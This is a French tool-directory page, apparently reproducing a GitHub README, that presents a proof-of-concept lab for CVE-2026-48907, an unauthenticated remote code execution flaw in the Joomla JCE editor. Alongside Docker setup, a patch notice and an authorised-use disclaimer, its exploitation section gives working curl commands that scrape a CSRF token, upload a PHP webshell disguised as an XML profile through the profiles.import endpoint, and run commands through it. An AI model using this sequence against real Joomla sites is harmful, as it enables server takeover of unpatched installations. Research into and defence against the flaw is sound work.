Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-48907 — POC for CVE-2026-48907 | Kitploit
Outils/GitHubGitHub/pssec-io/cve-2026-48907
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & EducationPayload DevelopmentLabs & Practice
GitHubpssec-io/cve-2026-48907

CVE-2026-48907

POC for CVE-2026-48907

Voir le dépôt
1il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-48907 — Laboratoire RCE non authentifié Joomla JCE

PSsec Laboratoire de recherche en sécurité éducative pour CVE-2026-48907.


Aperçu

CVE-2026-48907 est une vulnérabilité critique (CVSS 10.0) d'exécution de code à distance non authentifiée dans JCE (Joomla Content Editor), l'extension d'éditeur la plus installée sur Joomla, affectant toutes les versions ≤ 2.9.99.4.

Le point de terminaison profiles.import accepte les téléchargements de fichiers sans aucune authentification. Un attaquant peut télécharger un fichier PHP malveillant déguisé en profil XML, qui est écrit dans le répertoire tmp/ du serveur et exécuté directement via HTTP — aucune information d'identification requise.

DétailValeur
CVECVE-2026-48907
Score CVSS10.0 Critique
Versions affectéesJCE ≤ 2.9.99.4
Versions corrigéesJCE ≥ 2.9.99.5
Listé CISA KEVOui — 16 juin 2026
Exploité activementOui

Configuration du laboratoire

Prérequis

  • Docker + Docker Compose
  • Kali Linux (ou tout hôte Linux)

1. Démarrer l'environnement vulnérable

root@kitploit:~
docker compose up -d

2. Terminer l'installateur Joomla

Ouvrez http://localhost:8080 dans votre navigateur et terminez l'assistant d'installation en utilisant ces identifiants :

ChampValeur
Hôte de la base de donnéesdb
Nom de la base de donnéesjoomla
Utilisateur de la base de données

3. Installer l'extension JCE vulnérable

root@kitploit:~
wget https://github.com/widgetfactory/jce/releases/download/2.9.99.4/pkg_jce_29994.zip

Ensuite, dans l'administration Joomla → Système → Extensions → Installer → téléversez le ZIP.


Exploitation

4. Extraire le jeton CSRF et le cookie de session

root@kitploit:~
URL=http://localhost:8080
TOKEN=$(curl -s -c cookies.txt "$URL/" \
  | sed -n 's/.*"csrf\.token"[[:space:]]*:[[:space:]]*"\([a-f0-9]\{32\}\)".*/\1/p; s/.*name="\([a-f0-9]\{32\}\)"[^>]*value="1".*/\1/p' \
  | head -n1)

5. Téléverser une webshell PHP via l'import de profil non authentifié

root@kitploit:~
curl -i -s -b cookies.txt -c cookies.txt \
  -F "[email protected];type=application/xml" \
  -F "task=profiles.import" \
  -F "${TOKEN}=1" \
  "$URL/index.php?option=com_jce"

6. Vérifier l'exécution de code à distance

root@kitploit:~
curl -i -s -b cookies.txt -c cookies.txt \
  "$URL/tmp/shell.xml.php?cmd=id"

Sortie attendue : uid=33(www-data) gid=33(www-data)


Fichiers

FichierDescription
docker-compose.ymlDémarre Joomla 5.3.1 vulnérable + MySQL 8.0
shell.xml.phpCharge utile minimale de webshell PHP
instructions.txtNotes d'exploitation étape par étape

Correction

Mettez à jour JCE vers la version 2.9.99.5 ou ultérieure immédiatement.

Avis officiel du fournisseur et correctif gratuit pour les anciennes versions de Joomla : JCE Security Update — joomlacontenteditor.net


Crédits

  • Référence de l'outil d'exploitation : JoomlaSniper par ynsmroztas
  • Vulnérabilité découverte dans la nature par Phil Taylor de mySites.guru
  • Liste CISA KEV : 16 juin 2026

Avertissement

Ce dépôt est destiné uniquement à des fins éducatives et de recherche en sécurité autorisée.

Les tests ne doivent être effectués que sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation écrite explicite de tester. L'utilisation non autorisée de ce contenu contre des systèmes que vous ne possédez pas est illégale et contraire à l'éthique. Les auteurs et Pansophical OU déclinent toute responsabilité en cas d'utilisation abusive de ce contenu.

Cet environnement de laboratoire est intentionnellement vulnérable. Ne l'exposez pas à Internet ou à tout réseau non fiable.


Par PSsec

Télécharger l’outil
joomla
Mot de passe de la base de donnéesjoomlapass